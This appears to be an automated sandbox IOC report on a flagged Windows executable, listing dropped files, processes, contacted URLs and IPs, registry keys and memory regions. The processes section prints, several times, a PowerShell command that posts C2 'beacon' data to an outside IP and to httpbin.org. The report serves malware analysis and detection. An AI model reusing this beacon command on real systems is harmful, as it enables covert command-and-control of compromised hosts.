IOC Report
SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe

loading gif

Files

File Path
Type
Category
Malicious
SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe
PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_13to5vl5.qjb.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ar5cncj.aol.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_agnoeq0v.q4h.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aio0ubsg.ixi.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gfpavd4s.aei.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hlvipkkl.bcf.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kmcuaaj5.oof.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lnmsewhx.qgh.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mx4dkhw4.z0q.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pp4ibco5.rsx.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qmlrqvwh.mlt.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rfakr5b5.h23.psm1
ASCII text, with no line terminators
dropped
\Device\Null
ASCII text, with CRLF line terminators
dropped
There are 6 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe
"C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b|ConvertTo-Json) -headers $headers -ContentType \"application/json\""
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://httpbin.org/post\" -method post -body ($b|ConvertTo-Json) -headers $headers -ContentType \"application/json\""
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b|ConvertTo-Json) -headers $headers -ContentType \"application/json\""
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://httpbin.org/post\" -method post -body ($b|ConvertTo-Json) -headers $headers -ContentType \"application/json\""
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b|ConvertTo-Json) -headers $headers -ContentType \"application/json\""
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://httpbin.org/post\" -method post -body ($b|ConvertTo-Json) -headers $headers -ContentType \"application/json\""
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
http://httpbin.org/post
107.22.40.220
malicious
http://44.207.250.251
unknown
malicious
http://httpbin.org
unknown
malicious
http://44.207.250.251/post
44.207.250.251
malicious
http://httpbin.o
unknown
malicious
http://nuget.org/NuGet.exe
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://44.207.250.251/post34282f2a34282f2b356a75696e.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
unknown
https://go.micro
unknown
http://www.microsoft.co
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://httpbin.org/postpowershell.exe.compowershell.exe.exepowershell.exe.batpowershell.exe.cmd
unknown
https://github.com/Pester/Pester
unknown
http://httpbin.org/post8
unknown
http://httpbin.org/post873743475687d356a75696e
unknown
https://github.com/Pester/Pesterp
unknown
http://crl.micro
unknown
http://httpbin.org/post873743475687d356a75696eC:
unknown
http://44.207.250.251/postPATHEXTPATHEXT=::=::
unknown
http://44.207.250.251/post34282f2a34282f2b356a75696e
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://www.apache.org/licenses/LICE
unknown
https://aka.ms/pscore68
unknown
http://httpbin.org/postmplant
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://44.207.250.251/postPATHEXTC:
unknown
http://httpbin.org/postpowershell.exe.compowershell.exe.exepowershell.exe.batpowershell.exe.cmdpower
unknown
http://httpbin.org/post873743475687d356a75696ehttp://httpbin.org/postpowershell.exe.compowershell.ex
unknown
There are 21 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
httpbin.org
107.22.40.220
malicious

IPs

IP
Domain
Country
Malicious
107.22.40.220
httpbin.org
United States
malicious
44.207.250.251
unknown
United States
malicious
34.236.15.216
unknown
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 4 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
7FFD9B990000
trusted library allocation
page read and write
2009D7B0000
heap
page read and write
5382879000
stack
page read and write
1F4223DA000
trusted library allocation
page read and write
7FFD9BB72000
trusted library allocation
page read and write
2084884B000
trusted library allocation
page read and write
1F422AAA000
trusted library allocation
page read and write
1DCA9198000
trusted library allocation
page read and write
7FFD9BD7A000
trusted library allocation
page read and write
7FFD9BA4C000
trusted library allocation
page execute and read and write
7FFD9BD90000
trusted library allocation
page read and write
20085585000
trusted library allocation
page read and write
6F740F7000
stack
page read and write
16681C40000
heap
page read and write
63C4FFE000
stack
page read and write
1F180001000
trusted library allocation
page read and write
7FFD9BBF0000
trusted library allocation
page read and write
1F421A60000
trusted library allocation
page read and write
7FFD9B920000
trusted library allocation
page execute and read and write
7FFD9BA46000
trusted library allocation
page read and write
1DC853B6000
trusted library allocation
page read and write
A60000
unkown
page readonly
7FFD9BB22000
trusted library allocation
page read and write
C25DDB8000
stack
page read and write
1F1EA16A000
heap
page read and write
C000096000
direct allocation
page read and write
C000152000
direct allocation
page read and write
1F1E9F93000
heap
page read and write
7FFD9BA70000
trusted library allocation
page execute and read and write
7FFD9BC50000
trusted library allocation
page read and write
7FFD9BDC0000
trusted library allocation
page read and write
7FFD9B993000
trusted library allocation
page execute and read and write
7FFD9BA40000
trusted library allocation
page read and write
200835B0000
trusted library allocation
page read and write
7FFD9BA30000
trusted library allocation
page read and write
7FFD9BBAC000
trusted library allocation
page read and write
1DC9D090000
heap
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
7FFD9BC10000
trusted library allocation
page read and write
7FFD9BD40000
trusted library allocation
page read and write
7FFD9BD13000
trusted library allocation
page read and write
1F180C32000
trusted library allocation
page read and write
6F73EFF000
stack
page read and write
C25DC79000
stack
page read and write
7FFD9BD40000
trusted library allocation
page read and write
1DCA8800000
trusted library allocation
page read and write
20848260000
heap
page read and write
6F74ECD000
stack
page read and write
63C4BFD000
stack
page read and write
7FFD9BD66000
trusted library allocation
page read and write
7FFD9BB04000
trusted library allocation
page read and write
1F1E9860000
trusted library allocation
page read and write
7FFD9BD70000
trusted library allocation
page read and write
7FFD9BCA0000
trusted library allocation
page read and write
1F1EA175000
heap
page read and write
7FFD9B9B2000
trusted library allocation
page read and write
7FFD9BC30000
trusted library allocation
page read and write
538257E000
stack
page read and write
1DC84F43000
trusted library allocation
page read and write
7FFD9BC10000
trusted library allocation
page read and write
7FFD9B980000
trusted library allocation
page read and write
1F421B00000
heap
page execute and read and write
C000010000
direct allocation
page read and write
1DC94F73000
trusted library allocation
page read and write
20846960000
heap
page read and write
208491D7000
trusted library allocation
page read and write
C0000AC000
direct allocation
page read and write
C000088000
direct allocation
page read and write
7FFD9BD80000
trusted library allocation
page read and write
7FFD9BB1B000
trusted library allocation
page read and write
20860AF8000
heap
page read and write
7FFD9BCE2000
trusted library allocation
page read and write
7FFD9BD50000
trusted library allocation
page read and write
7FFD9BCA0000
trusted library allocation
page read and write
7FFD9B750000
trusted library allocation
page read and write
1F43A2A8000
heap
page read and write
7FFD9BCE9000
trusted library allocation
page read and write
6F74E4E000
stack
page read and write
2084699C000
heap
page read and write
208608F3000
heap
page read and write
7FFD9BB01000
trusted library allocation
page read and write
7FFD9BD90000
trusted library allocation
page read and write
7FFD9BDA0000
trusted library allocation
page read and write
C25DB7E000
stack
page read and write
A1E6E3E000
stack
page read and write
B7D000
unkown
page readonly
6F74079000
stack
page read and write
7FFD9BAA9000
trusted library allocation
page read and write
1DCB877C000
trusted library allocation
page read and write
7FFD9BCA0000
trusted library allocation
page read and write
7FFD9BC10000
trusted library allocation
page read and write
20083525000
heap
page read and write
C00010A000
direct allocation
page read and write
1F1817C6000
trusted library allocation
page read and write
C0000B8000
direct allocation
page read and write
1F4225FC000
trusted library allocation
page read and write
C000018000
direct allocation
page read and write
1F1E9E06000
heap
page read and write
7FFD9BD65000
trusted library allocation
page read and write
208469BC000
heap
page read and write
2008557B000
trusted library allocation
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
7FFD9BCB0000
trusted library allocation
page read and write
7FFD9BD0D000
trusted library allocation
page read and write
1DCA6840000
heap
page read and write
C000050000
direct allocation
page read and write
7FFD9BD0D000
trusted library allocation
page read and write
7FFD9BBD0000
trusted library allocation
page read and write
C05000
unkown
page read and write
7FFD9B932000
trusted library allocation
page read and write
7FFD9BCC0000
trusted library allocation
page read and write
7FFD9BCF6000
trusted library allocation
page read and write
7FFD9BD40000
trusted library allocation
page read and write
2009D557000
heap
page read and write
7FFD9BB31000
trusted library allocation
page read and write
7FFD9B98D000
trusted library allocation
page execute and read and write
63C5BCE000
stack
page read and write
208491C7000
trusted library allocation
page read and write
1DC9D0D8000
heap
page read and write
C000130000
direct allocation
page read and write
1F18199D000
trusted library allocation
page read and write
C25DAFF000
stack
page read and write
7FFD9BD5A000
trusted library allocation
page read and write
7FFD9BB30000
trusted library allocation
page read and write
1DC831B8000
heap
page read and write
1F43A047000
heap
page read and write
1DC9D139000
heap
page read and write
208609E0000
heap
page read and write
C0000E0000
direct allocation
page read and write
7FFD9B8F0000
trusted library allocation
page read and write
7FFD9BD43000
trusted library allocation
page read and write
1DC84F4B000
trusted library allocation
page read and write
1F1E9975000
heap
page read and write
1DC85D00000
trusted library allocation
page read and write
7FFD9BBE0000
trusted library allocation
page read and write
7FFD9BAA0000
trusted library allocation
page execute and read and write
1DCA6944000
heap
page read and write
1F420151000
heap
page read and write
C00007E000
direct allocation
page read and write
7FFD9BA46000
trusted library allocation
page read and write
2084923E000
trusted library allocation
page read and write
6F742FE000
stack
page read and write
C000002000
direct allocation
page read and write
1DCC08BD000
heap
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
7FFD9BD2C000
trusted library allocation
page read and write
7FFD9BC40000
trusted library allocation
page read and write
1F1E8066000
heap
page read and write
7FFD9BBA0000
trusted library allocation
page read and write
C25D9FF000
stack
page read and write
1F1E9880000
trusted library allocation
page read and write
C25DF3F000
stack
page read and write
1F4200FC000
heap
page read and write
16681D20000
heap
page read and write
1F4227E6000
trusted library allocation
page read and write
C0000B6000
direct allocation
page read and write
20858750000
trusted library allocation
page read and write
5382BBE000
stack
page read and write
1F1E9890000
heap
page readonly
1DC84EF0000
heap
page execute and read and write
7FFD9BC20000
trusted library allocation
page read and write
7FFD9BCA0000
trusted library allocation
page read and write
7FFD9BD30000
trusted library allocation
page read and write
63C4DF8000
stack
page read and write
7FFD9B970000
trusted library allocation
page read and write
7FFD9BD98000
trusted library allocation
page read and write
1F1E7E30000
heap
page read and write
A1E697E000
stack
page read and write
1F4200C5000
heap
page read and write
7FFD9BD05000
trusted library allocation
page read and write
208491DF000
trusted library allocation
page read and write
1DCB876E000
trusted library allocation
page read and write
7FFD9B983000
trusted library allocation
page execute and read and write
7FFD9BC20000
trusted library allocation
page read and write
1F1E7FAC000
heap
page read and write
C000016000
direct allocation
page read and write
1DCC0A73000
heap
page read and write
7FFD9BD35000
trusted library allocation
page read and write
7FFD9B990000
trusted library allocation
page read and write
1DC83100000
heap
page read and write
1F1E7F30000
heap
page read and write
7FFD9BCD0000
trusted library allocation
page read and write
2008352E000
heap
page read and write
C00003E000
direct allocation
page read and write
1F422138000
trusted library allocation
page read and write
21FF3FD000
stack
page read and write
C25DA7D000
stack
page read and write
21FF9FD000
stack
page read and write
208469E3000
heap
page read and write
A1E6EBF000
stack
page read and write
63C4F79000
stack
page read and write
7FFD9BD80000
trusted library allocation
page read and write
C00009A000
direct allocation
page read and write
7FFD9B982000
trusted library allocation
page read and write
20083628000
heap
page read and write
1DC85988000
trusted library allocation
page read and write
2009D6A7000
heap
page execute and read and write
7FFD9BDE0000
trusted library allocation
page read and write
7FFD9BB50000
trusted library allocation
page read and write
7FFD9BB60000
trusted library allocation
page execute and read and write
166A7840000
direct allocation
page read and write
7FFD9BD93000
trusted library allocation
page read and write
2008557F000
trusted library allocation
page read and write
5382473000
stack
page read and write
1DCA875D000
trusted library allocation
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
1DCC0893000
heap
page read and write
6F73DFF000
stack
page read and write
1F1EA027000
heap
page execute and read and write
7FFD9BD1C000
trusted library allocation
page read and write
200953A1000
trusted library allocation
page read and write
1F422A58000
trusted library allocation
page read and write
A1E6B3F000
stack
page read and write
1DCA8330000
heap
page read and write
7FFD9BC60000
trusted library allocation
page read and write
6F7437E000
stack
page read and write
1DCA8EC6000
trusted library allocation
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
C12000
unkown
page read and write
7FFD9BADF000
trusted library allocation
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
7FFD9BBC0000
trusted library allocation
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
20085579000
trusted library allocation
page read and write
7FFD9BCB0000
trusted library allocation
page read and write
20860869000
heap
page read and write
7FFD9BD00000
trusted library allocation
page read and write
7FFD9BBB0000
trusted library allocation
page read and write
1F1E98D0000
trusted library allocation
page read and write
7FFD9BBE0000
trusted library allocation
page read and write
1DC856C4000
trusted library allocation
page read and write
6F73E7C000
stack
page read and write
7FFD9BDB0000
trusted library allocation
page read and write
7FFD9B99D000
trusted library allocation
page execute and read and write
C79000
unkown
page readonly
1F1E9DA0000
heap
page execute and read and write
1DC83110000
trusted library allocation
page read and write
1F181622000
trusted library allocation
page read and write
C25DE3E000
stack
page read and write
1F422123000
trusted library allocation
page read and write
7FFD9BD03000
trusted library allocation
page read and write
7FFD9BC40000
trusted library allocation
page read and write
1DC94F01000
trusted library allocation
page read and write
7FFD9B983000
trusted library allocation
page execute and read and write
C000025000
direct allocation
page read and write
7FFD9BDA0000
trusted library allocation
page read and write
1F1E9F5F000
heap
page read and write
7FFD9BB25000
trusted library allocation
page read and write
C000074000
direct allocation
page read and write
7FFD9BCE0000
trusted library allocation
page read and write
1F43A0DF000
heap
page read and write
1F43A156000
heap
page execute and read and write
C0000A8000
direct allocation
page read and write
7FFD9BC00000
trusted library allocation
page read and write
1DCA6740000
heap
page read and write
7FFD9BB90000
trusted library allocation
page read and write
7DF439B20000
trusted library allocation
page execute and read and write
5382ABE000
stack
page read and write
20860AD0000
heap
page read and write
21FEED3000
stack
page read and write
1DCA83B5000
heap
page read and write
7FFD9BC70000
trusted library allocation
page read and write
7FFD9B800000
trusted library allocation
page read and write
20848C23000
trusted library allocation
page read and write
7FFD9BBF3000
trusted library allocation
page read and write
7FFD9BD34000
trusted library allocation
page read and write
20860B38000
heap
page read and write
1F422AAD000
trusted library allocation
page read and write
7FFD9BD90000
trusted library allocation
page read and write
7DF40C6B0000
trusted library allocation
page execute and read and write
1F432021000
trusted library allocation
page read and write
1F1902F0000
trusted library allocation
page read and write
C00007A000
direct allocation
page read and write
7FFD9BD68000
trusted library allocation
page read and write
1F181632000
trusted library allocation
page read and write
1DC9D087000
heap
page execute and read and write
20848855000
trusted library allocation
page read and write
1F1E9DF0000
heap
page read and write
20848840000
trusted library allocation
page read and write
7FFD9BD36000
trusted library allocation
page read and write
7FFD9BD0F000
trusted library allocation
page read and write
7FFD9BAD5000
trusted library allocation
page read and write
7FFD9BB32000
trusted library allocation
page read and write
20858741000
trusted library allocation
page read and write
20085856000
trusted library allocation
page read and write
20860878000
heap
page read and write
1F1E9FF1000
heap
page read and write
C0000B4000
direct allocation
page read and write
7FFD9BA40000
trusted library allocation
page read and write
7FFD9BCD0000
trusted library allocation
page read and write
7FFD9B950000
trusted library allocation
page read and write
C00009E000
direct allocation
page read and write
7FFD9B810000
trusted library allocation
page execute and read and write
A1E6C39000
stack
page read and write
7FFD9BDA0000
trusted library allocation
page read and write
C000090000
direct allocation
page read and write
7FFD9BB80000
trusted library allocation
page execute and read and write
63C5C4D000
stack
page read and write
1DC8502B000
trusted library allocation
page read and write
2084699E000
heap
page read and write
C0000AA000
direct allocation
page read and write
7FFD9BDD0000
trusted library allocation
page read and write
20084F90000
heap
page read and write
7FFD9BB40000
trusted library allocation
page execute and read and write
200857E0000
trusted library allocation
page read and write
2009D5F0000
heap
page read and write
7FFD9BC4D000
trusted library allocation
page read and write
1DCA68C0000
heap
page read and write
C13000
unkown
page write copy
63C4CFE000
stack
page read and write
C000136000
direct allocation
page read and write
21FEF5D000
stack
page read and write
7FFD9BD13000
trusted library allocation
page read and write
1DC849E0000
heap
page readonly
7FFD9B9B0000
trusted library allocation
page read and write
1DC85068000
trusted library allocation
page read and write
1F1E9910000
trusted library allocation
page read and write
C00012C000
direct allocation
page read and write
16681C84000
direct allocation
page read and write
7FFD9BB90000
trusted library allocation
page read and write
6F73F7E000
stack
page read and write
7FFD9BD3A000
trusted library allocation
page read and write
1F1817BD000
trusted library allocation
page read and write
7FFD9B9BD000
trusted library allocation
page execute and read and write
21FEFDF000
stack
page read and write
16681CF0000
direct allocation
page read and write
7FFD9BD76000
trusted library allocation
page read and write
1DCC0A20000
heap
page read and write
1F420188000
heap
page read and write
C0000B0000
direct allocation
page read and write
7FFD9BD55000
trusted library allocation
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
1DC9D14C000
heap
page read and write
2009D574000
heap
page read and write
7FFD9BD4A000
trusted library allocation
page read and write
7FFD9BD5F000
trusted library allocation
page read and write
1DC83170000
heap
page read and write
7FFD9BCE6000
trusted library allocation
page read and write
200853FD000
trusted library allocation
page read and write
2009D7FB000
heap
page read and write
A1E6CB8000
stack
page read and write
1F43A065000
heap
page read and write
200854B4000
trusted library allocation
page read and write
1DC8316C000
heap
page read and write
C74000
unkown
page readonly
C74000
unkown
page readonly
1F43A270000
heap
page read and write
16681C89000
direct allocation
page read and write
7FFD9BBD6000
trusted library allocation
page read and write
1F1E7FBC000
heap
page read and write
20848710000
heap
page execute and read and write
C000124000
direct allocation
page read and write
2008549C000
trusted library allocation
page read and write
7FFD9BBB0000
trusted library allocation
page read and write
1DC9D2DA000
heap
page read and write
208469A8000
heap
page read and write
1DC849D0000
trusted library allocation
page read and write
20084F30000
heap
page read and write
7FFD9BAB0000
trusted library allocation
page execute and read and write
20860860000
heap
page read and write
1DC84F40000
trusted library allocation
page read and write
1DCC0CD0000
heap
page read and write
7FFD9BD46000
trusted library allocation
page read and write
7FFD9BBD0000
trusted library allocation
page read and write
7FFD9B994000
trusted library allocation
page read and write
7FFD9BB38000
trusted library allocation
page read and write
7FFD9BBF0000
trusted library allocation
page read and write
16681D40000
heap
page read and write
2084879D000
trusted library allocation
page read and write
200853D1000
trusted library allocation
page read and write
21FF27E000
stack
page read and write
7FFD9BBD4000
trusted library allocation
page read and write
1DC9D290000
heap
page read and write
16681D00000
direct allocation
page read and write
1DCB8710000
trusted library allocation
page read and write
7FFD9BCE8000
trusted library allocation
page read and write
1DCA6820000
heap
page read and write
1F190075000
trusted library allocation
page read and write
1F1E7FF5000
heap
page read and write
1DCA69B3000
heap
page read and write
7FFD9BD1A000
trusted library allocation
page read and write
7FFD9BD64000
trusted library allocation
page read and write
7FFD9BD46000
trusted library allocation
page read and write
1DC83105000
heap
page read and write
1DCA87F2000
trusted library allocation
page read and write
7FFD9BB3A000
trusted library allocation
page read and write
7FFD9BD10000
trusted library allocation
page read and write
7FFD9B993000
trusted library allocation
page execute and read and write
7FFD9BC30000
trusted library allocation
page read and write
7FFD9BC30000
trusted library allocation
page read and write
B7D000
unkown
page readonly
1F18161C000
trusted library allocation
page read and write
20085577000
trusted library allocation
page read and write
20848D01000
trusted library allocation
page read and write
7FFD9BD63000
trusted library allocation
page read and write
7FFD9BC00000
trusted library allocation
page read and write
1DCA6908000
heap
page read and write
C25E03E000
stack
page read and write
7FFD9BD60000
trusted library allocation
page read and write
C000054000
direct allocation
page read and write
7FFD9BAB0000
trusted library allocation
page execute and read and write
7FFD9BCE0000
trusted library allocation
page read and write
2009D571000
heap
page read and write
1F43A2B8000
heap
page read and write
A1E798D000
stack
page read and write
7FFD9BAEA000
trusted library allocation
page read and write
200854B1000
trusted library allocation
page read and write
53824FF000
stack
page read and write
7FFD9BD60000
trusted library allocation
page read and write
1F420060000
heap
page read and write
C25D873000
stack
page read and write
7FFD9B836000
trusted library allocation
page execute and read and write
7FFD9B80C000
trusted library allocation
page execute and read and write
16681CE0000
direct allocation
page read and write
1DC830C0000
heap
page read and write
21FF93C000
stack
page read and write
1F42206C000
trusted library allocation
page read and write
7FFD9BA4C000
trusted library allocation
page execute and read and write
1DC83174000
heap
page read and write
7FFD9BD48000
trusted library allocation
page read and write
1F181628000
trusted library allocation
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
1DC94F81000
trusted library allocation
page read and write
1F4224D6000
trusted library allocation
page read and write
1F1E9F35000
heap
page read and write
1DCA8721000
trusted library allocation
page read and write
7FFD9BA30000
trusted library allocation
page read and write
7FFD9BCC0000
trusted library allocation
page read and write
A1E790E000
stack
page read and write
1DC82F80000
heap
page read and write
1F180232000
trusted library allocation
page read and write
7FFD9BC80000
trusted library allocation
page read and write
1DC9D650000
heap
page read and write
208469E5000
heap
page read and write
7FFD9BD68000
trusted library allocation
page read and write
200953B1000
trusted library allocation
page read and write
7FFD9BBA0000
trusted library allocation
page read and write
1F43A0B5000
heap
page read and write
7FFD9BBA0000
trusted library allocation
page execute and read and write
63C4A7E000
stack
page read and write
1DCC0930000
heap
page read and write
200835F2000
heap
page read and write
4F9B9FE000
stack
page read and write
208482B5000
heap
page read and write
20085583000
trusted library allocation
page read and write
2009D4B8000
heap
page read and write
2009D4DC000
heap
page read and write
1DCC0A62000
heap
page read and write
1F1EA1A9000
heap
page read and write
63C4EF9000
stack
page read and write
200835D0000
trusted library allocation
page read and write
7FFD9B980000
trusted library allocation
page read and write
200835E0000
heap
page read and write
5382937000
stack
page read and write
7FFD9BBF0000
trusted library allocation
page read and write
7FFD9BB45000
trusted library allocation
page read and write
A1E6DBE000
stack
page read and write
1DC9D0DE000
heap
page read and write
C25EA8E000
stack
page read and write
7FFD9BC00000
trusted library allocation
page read and write
1F43A2AB000
heap
page read and write
20084F95000
heap
page read and write
7FFD9BB41000
trusted library allocation
page read and write
7FFD9BDB0000
trusted library allocation
page read and write
7FFD9BD78000
trusted library allocation
page read and write
C000048000
direct allocation
page read and write
7FFD9BC20000
trusted library allocation
page read and write
6F7447B000
stack
page read and write
A1E6AF9000
stack
page read and write
7FFD9BB40000
trusted library allocation
page read and write
7FFD9BD8F000
trusted library allocation
page read and write
C000022000
direct allocation
page read and write
1F190001000
trusted library allocation
page read and write
1DCA68C7000
heap
page read and write
BFF000
unkown
page write copy
1DC9D1B0000
heap
page read and write
2009D802000
heap
page read and write
1F1E7F77000
heap
page read and write
7FFD9B984000
trusted library allocation
page read and write
7FFD9BB62000
trusted library allocation
page read and write
7FFD9BB80000
trusted library allocation
page read and write
A1E69FD000
stack
page read and write
C000132000
direct allocation
page read and write
7FFD9BD15000
trusted library allocation
page read and write
7FFD9BD73000
trusted library allocation
page read and write
7FFD9BDA0000
trusted library allocation
page read and write
1F1E8200000
heap
page read and write
7FFD9BCF0000
trusted library allocation
page read and write
7FFD9BB10000
trusted library allocation
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
20085575000
trusted library allocation
page read and write
1DCC0ACA000
heap
page read and write
4F9BBFE000
stack
page read and write
1F4200C7000
heap
page read and write
1DCA8BE3000
trusted library allocation
page read and write
7FFD9BB08000
trusted library allocation
page read and write
208467F0000
heap
page read and write
7FFD9B9EC000
trusted library allocation
page execute and read and write
208487C4000
trusted library allocation
page read and write
208587B9000
trusted library allocation
page read and write
1DCA69C0000
trusted library allocation
page read and write
7FFD9BD03000
trusted library allocation
page read and write
7FFD9BB4A000
trusted library allocation
page read and write
1DC84A80000
heap
page read and write
7FFD9BD40000
trusted library allocation
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
7FFD9BA6E000
trusted library allocation
page execute and read and write
7FFD9BC50000
trusted library allocation
page read and write
2084875C000
trusted library allocation
page read and write
7FFD9BD0E000
trusted library allocation
page read and write
1F4201C0000
heap
page read and write
1DCA9444000
trusted library allocation
page read and write
7FFD9BBB0000
trusted library allocation
page read and write
2009540E000
trusted library allocation
page read and write
7FFD9BC90000
trusted library allocation
page read and write
1F1E9FCB000
heap
page read and write
20848CB7000
trusted library allocation
page read and write
7FFD9B901000
trusted library allocation
page read and write
1F1EA020000
heap
page execute and read and write
C0000E4000
direct allocation
page read and write
1DC83130000
heap
page read and write
A1E65CE000
stack
page read and write
7FFD9BCB0000
trusted library allocation
page read and write
C000122000
direct allocation
page read and write
1DC94F10000
trusted library allocation
page read and write
7FFD9BCFB000
trusted library allocation
page read and write
7FFD9BBE0000
trusted library allocation
page read and write
A1E64C3000
